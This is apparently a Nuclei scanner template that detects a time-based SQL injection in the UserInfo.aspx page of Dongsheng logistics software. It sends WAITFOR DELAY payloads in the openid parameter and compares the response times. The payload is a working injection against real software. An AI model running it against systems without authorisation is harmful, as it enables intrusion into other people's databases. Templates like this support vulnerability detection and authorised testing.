id: dongshengwuliu-UserInfo_aspx-sql-time

info:
  name: 东胜物流软件 UserInfo.aspx SQL注入漏洞
  author: dongshengwuliu
  severity: high
  tags: sql injection

http:
  - raw:
      - |
        GET /Areas/Mobile/Views/Login/UserInfo.aspx?openid=1%27WAITFOR%20DELAY%20%270:0:4%27-- HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /Areas/Mobile/Views/Login/UserInfo.aspx?openid=1%27WAITFOR%20DELAY%20%270:0:8%27-- HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=4 && duration_1<=5'  
          - 'duration_2>=8 && duration_2<=9'
        condition: and